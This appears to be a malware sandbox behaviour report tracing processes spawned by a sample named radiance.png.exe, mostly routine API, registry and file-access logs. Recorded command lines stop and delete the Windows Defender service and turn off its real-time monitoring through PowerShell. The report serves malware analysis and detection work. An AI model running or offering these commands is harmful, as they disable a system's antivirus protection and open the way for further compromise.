Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\2XC7u663GxWc\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xdd0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000001	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #3: cmd.exe

Information	Value
ID	#3
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c sc stop WinDefend
Initial Working Directory	C:\Users\2XC7u663GxWc\Desktop\
Monitor	Start Time: 00:00:26, Reason: Child Process
Unmonitor	End Time: 00:00:28, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

Information	Value
PID	0xd78
Parent PID	0xd50 (c:\users\2xc7u663gxwc\desktop\radiance.png.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x D7C

Threads

Thread 0xd7c

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:30:40 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10879275	1	Fn
System	Get Time	type = Performance Ctr, time = 10116240974	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a050000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 120, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\2XC7u663GxWc\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\sc.exe, os_pid = 0xdc8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000005	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #4: cmd.exe

Information	Value
ID	#4
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c sc delete WinDefend
Initial Working Directory	C:\Users\2XC7u663GxWc\Desktop\
Monitor	Start Time: 00:00:26, Reason: Child Process
Unmonitor	End Time: 00:00:28, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

Information	Value
PID	0xd94
Parent PID	0xd50 (c:\users\2xc7u663gxwc\desktop\radiance.png.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x D98

Threads

Thread 0xd98

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:30:40 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10879213	1	Fn
System	Get Time	type = Performance Ctr, time = 10110681499	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a050000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 128, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\Desktop, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\2XC7u663GxWc\Desktop	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\sc.exe, os_pid = 0xdc0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000005	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #5: sc.exe

Information	Value
ID	#5
File Name	c:\windows\system32\sc.exe
Command Line	sc delete WinDefend
Initial Working Directory	C:\Users\2XC7u663GxWc\Desktop\
Monitor	Start Time: 00:00:27, Reason: Child Process
Unmonitor	End Time: 00:00:28, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0xdc0
Parent PID	0xd94 (c:\windows\system32\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x DC4 0x DDC

Threads

Thread 0xdc4

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:30:40 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10879447	1	Fn
System	Get Time	type = Performance Ctr, time = 10139722838	1	Fn
Module	Get Handle	module_name = c:\windows\system32\sc.exe, base_address = 0x210000	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 51	1	Fn Data

Process #6: sc.exe

Information	Value
ID	#6
File Name	c:\windows\system32\sc.exe
Command Line	sc stop WinDefend
Initial Working Directory	C:\Users\2XC7u663GxWc\Desktop\
Monitor	Start Time: 00:00:27, Reason: Child Process
Unmonitor	End Time: 00:00:28, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0xdc8
Parent PID	0xd78 (c:\windows\system32\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x DCC 0x DD8

Threads

Thread 0xdcc

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-05-14 15:30:40 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10879416	1	Fn
System	Get Time	type = Performance Ctr, time = 10136278312	1	Fn
Module	Get Handle	module_name = c:\windows\system32\sc.exe, base_address = 0x210000	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
Service	Open Manager	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
Service	Open	database_name = SERVICES_ACTIVE_DATABASE	1	Fn
File	Get Info	filename = STD_OUTPUT_HANDLE, type = file_type	1	Fn
File	Write	filename = STD_OUTPUT_HANDLE, size = 51	1	Fn Data

Process #7: powershell.exe

824

Information	Value
ID	#7
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory	C:\Users\2XC7u663GxWc\Desktop\
Monitor	Start Time: 00:00:27, Reason: Child Process
Unmonitor	End Time: 00:00:45, Reason: Self Terminated
Monitor Duration	00:00:17

OS Process Information

Information	Value
PID	0xdd0
Parent PID	0xd6c (c:\windows\system32\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x DD4 0x DE0 0x DE4 0x DE8 0x DEC 0x DF0 0x E18 0x E1C

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	Actions
microsoft.powershell.consolehost.ni.dll	0x72240000	0x722C0FFF	Content Changed	-	32-bit	0x7229AF64, 0x72254390	... Region Actions Download Dump
powershell.exe	0x21F80000	0x21FF1FFF	Relevant Image	-	32-bit	-	... Region Actions Download Dump
system.ni.dll	0x6A240000	0x6A9DBFFF	Content Changed	-	32-bit	0x6A337964	... Region Actions Download Dump
system.ni.dll	0x6A240000	0x6A9DBFFF	Content Changed	-	32-bit	0x6A3A11E0	... Region Actions Download Dump
system.ni.dll	0x6A240000	0x6A9DBFFF	Content Changed	-	32-bit	0x6A357630	... Region Actions Download Dump
system.ni.dll	0x6A240000	0x6A9DBFFF	Content Changed	-	32-bit	0x6A372300	... Region Actions Download Dump
system.ni.dll	0x6A240000	0x6A9DBFFF	Content Changed	-	32-bit	0x6A34CFF8, 0x6A80009C, ...	... Region Actions Download Dump

Threads

Thread 0xdd4

604

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Get Environment String	name = MshEnableTrace	12	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Environment	Set Environment String	name = PSMODULEPATH, value = C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
System	Get Info	type = Hardware Information	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096	41	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
